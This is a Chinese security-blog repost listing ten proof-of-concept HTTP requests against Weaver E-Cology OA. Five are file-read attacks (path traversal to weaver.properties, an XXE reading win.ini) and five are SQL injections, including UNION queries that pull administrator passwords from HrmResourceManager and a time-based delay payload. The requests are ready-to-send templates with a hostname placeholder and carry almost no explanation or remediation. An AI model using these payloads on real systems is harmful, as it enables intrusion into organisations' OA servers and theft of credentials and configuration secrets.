泛微OA E-Cology漏洞汇总1期

admin 2024年7月10日11:28:39评论12 views字数 7859阅读26分11秒阅读模式
No.1

前言

    前几天整理文章,乱的一批,所以把一些以前发过的漏洞复现文章全部删除了,单独拿出来编辑到一个文章里,分为几期进行发布吧。每一期都附带清单,并且也不准备贴图了麻烦得很,只放POC。
No.2

漏洞汇总

泛微OA E-Cology漏洞汇总目录
1.泛微E-Cology PortalTsLogin文件读取漏洞
2.泛微E-Cology FileDownload文件读取漏洞
3.泛微E-Cology XmlRpcServlet文件读取漏洞
4.泛微E-Cology ResourceServlet文件读取漏洞
5.泛微E-Cology ProcessOverRequestByXml文件读取漏洞
6.泛微E-Cology Browser SQL注入漏洞
7.泛微E-Cology Getdata SQL注入漏洞
8.泛微E-Cology LoginSSO SQL注入漏洞
9.泛微E-Cology CptDwrUtil SQL注入漏洞
10.泛微E-Cology SyncUserInfo SQL注入漏洞
No.3

漏洞POC

1.泛微E-Cology PortalTsLogin文件读取漏洞。
GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_/../weaver.properties HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeAccept-Encoding: gzip
2.泛微E-Cology FileDownload文件读取漏洞。
GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
3.泛微E-Cology XmlRpcServlet文件读取漏。
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 206Accept-Encoding: gzipContent-Type: application/xml<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>WorkflowService.LoadTemplateProp</methodName><params><param><value><string>weaver</string></value></param></params></methodCall>
4.泛微E-Cology ResourceServlet文件读取漏洞。
GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
5.泛微E-Cology ProcessOverRequestByXml文件读取漏洞。
POST /rest/ofs/ProcessOverRequestByXml HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Length: 146Accept: */*Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/xml<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE test[<!ENTITY test SYSTEM "file:///c:/windows/win.ini">]><reset><syscode>&test;</syscode></reset>
6.泛微E-Cology Browser SQL注入漏洞。
POST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Content-Length: 3004Connection: closeContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzipisDis=1&browserTypeId=269&keyword=%25%32%35%36%31%25%32%35%32%37%25%32%35%32%30%25%32%35%37%35%25%32%35%36%65%25%32%35%36%39%25%32%35%36%66%25%32%35%36%65%25%32%35%32%30%25%32%35%37%33%25%32%35%36%35%25%32%35%36%63%25%32%35%36%35%25%32%35%36%33%25%32%35%37%34%25%32%35%32%30%25%32%35%33%31%25%32%35%32%63%25%32%35%32%37%25%32%35%32%37%25%32%35%32%62%25%32%35%32%38%25%32%35%32%38%25%32%35%35%33%25%32%35%34%35%25%32%35%34%63%25%32%35%34%35%25%32%35%34%33%25%32%35%35%34%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%32%25%32%35%33%30%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%32%25%32%35%33%30%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%30%25%32%35%33%37%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%32%38%25%32%35%35%33%25%32%35%34%35%25%32%35%34%63%25%32%35%34%35%25%32%35%34%33%25%32%35%35%34%25%32%35%32%30%25%32%35%32%38%25%32%35%34%33%25%32%35%34%31%25%32%35%35%33%25%32%35%34%35%25%32%35%32%30%25%32%35%35%37%25%32%35%34%38%25%32%35%34%35%25%32%35%34%65%25%32%35%32%30%25%32%35%32%38%25%32%35%33%37%25%32%35%33%33%25%32%35%33%33%25%32%35%33%36%25%32%35%33%64%25%32%35%33%37%25%32%35%33%33%25%32%35%33%33%25%32%35%33%36%25%32%35%32%39%25%32%35%32%30%25%32%35%35%34%25%32%35%34%38%25%32%35%34%35%25%32%35%34%65%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%34%25%32%35%33%39%25%32%35%32%39%25%32%35%32%30%25%32%35%34%35%25%32%35%34%63%25%32%35%35%33%25%32%35%34%35%25%32%35%32%30%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%34%25%32%35%33%38%25%32%35%32%39%25%32%35%32%30%25%32%35%34%35%25%32%35%34%65%25%32%35%34%34%25%32%35%32%39%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%30%25%32%35%33%37%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%62%25%32%35%34%33%25%32%35%34%38%25%32%35%34%31%25%32%35%35%32%25%32%35%32%38%25%32%35%33%31%25%32%35%33%31%25%32%35%33%33%25%32%35%32%39%25%32%35%32%39%25%32%35%32%39%25%32%35%32%62%25%32%35%32%37
7.泛微E-Cology Getdata SQL注入漏洞。
GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36Connection: closeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip
8.泛微E-Cology LoginSSO SQL注入漏洞。
GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36Connection: closeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip
9.泛微E-Cology CptDwrUtil SQL注入漏洞。
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/35.0.2117.157 Safari/537.36Content-Length: 189Accept-Encoding: gzipConnection: closeContent-Type: text/plaincallCount=1page=httpSessionId=scriptSessionId=c0-scriptName=DocDwrUtilc0-methodName=ifNewsCheckOutByCurrentUserc0-id=0c0-param0=string:1 WAITFOR DELAY '0:0:3'c0-param1=string:1batchId=0
10.泛微E-Cology SyncUserInfo SQL注入漏洞。
GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(3333*3333),null HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1

 

原文始发于微信公众号(剁椒Muyou鱼头):【漏洞复现】泛微OA E-Cology漏洞汇总1期

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月10日11:28:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微OA E-Cology漏洞汇总1期https://cn-sec.com/archives/2938486.html

发表评论

匿名网友 填写信息